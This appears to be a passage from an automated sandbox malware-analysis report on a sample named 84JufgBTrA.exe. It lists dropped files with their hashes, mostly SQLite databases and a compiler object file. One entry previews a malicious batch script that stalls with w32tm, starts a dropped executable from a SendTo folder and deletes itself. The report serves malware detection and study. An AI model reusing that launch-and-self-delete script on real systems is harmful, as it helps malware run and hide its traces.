                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5712781801655107
                                          Encrypted:false
                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:05A60B4620923FD5D53B9204391452AF
                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                          Malicious:false
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):221
                                          Entropy (8bit):5.202461001266817
                                          Encrypted:false
                                          SSDEEP:6:hCijTg3Nou1SV+DE1wn7qQ5ZIvKOZG1wkn23fvVN9zKn:HTg9uYDEm7R5ZIDfdGn
                                          MD5:308A2B4388BB6DF1844D88B87E5FD71A
                                          SHA1:209101B15B5E6A51CDD77E90FF6A2F800B21899D
                                          SHA-256:19634F9E2F35AE3840048DBA72A04756E1AC308BA3489FDE3BDD6433AA4FF3FA
                                          SHA-512:298C01E8C25B34E2D77B2F7B76EDD5D9B628E246346B176983CFECCA2FF0061E10C77C6EA87F208F955C4B6584F632F132FE86268CDECD8337AFA5027651A5EA
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Avira, Detection: 100%
                                          Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\SendTo\MaEiPrsQRasQLtRzJjb.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\OO0he60sKA.bat"
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):49152
                                          Entropy (8bit):0.8180424350137764
                                          Encrypted:false
                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                          MD5:349E6EB110E34A08924D92F6B334801D
                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):98304
                                          Entropy (8bit):0.08235737944063153
                                          Encrypted:false
                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5707520969659783
                                          Encrypted:false
                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e8, 10 symbols, created Fri Sep 13 20:27:22 2024, 1st section name ".debug$S"
                                          Category:dropped
                                          Size (bytes):1952
                                          Entropy (8bit):4.558926822524163
                                          Encrypted:false
                                          SSDEEP:24:HhbW96XOWFXsDfHXwKEsmNyluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0++UZ:KcKAKhmMluOulajfqXSfbNtmh5Z
                                          MD5:61CF01F37B2568229B8F2FBB40375EEF
                                          SHA1:8541F6B8F469ACD1126F98924B5453E9A287DB2D
                                          SHA-256:88EEE5049D42EC3B20EC15616AF0A3F9281AD8A9A314F810C116D3A0E4DE7099
                                          SHA-512:FB95D06ADDD3066981BD8A2C32B227F3A4FF981BEC68ADA40638C2DE667A877CFE887B01A85F58B6D4ABBAA5E0E4396144375CDE08B96459D83E2707DD4F3D31
                                          Malicious:false
                                          Preview:L...*..f.............debug$S........8...................@..B.rsrc$01................d...........@..@.rsrc$02........p...x...............@..@........<....c:\Windows\System32\CSCFD2815331994D75A9D1B7A464F57D19.TMP..................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RESC0BA.tmp.-.<....................a..Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5707520969659783
                                          Encrypted:false
                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5707520969659783
                                          Encrypted:false
                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5712781801655107
                                          Encrypted:false
                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:05A60B4620923FD5D53B9204391452AF
                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5712781801655107
                                          Encrypted:false
                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:05A60B4620923FD5D53B9204391452AF
                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
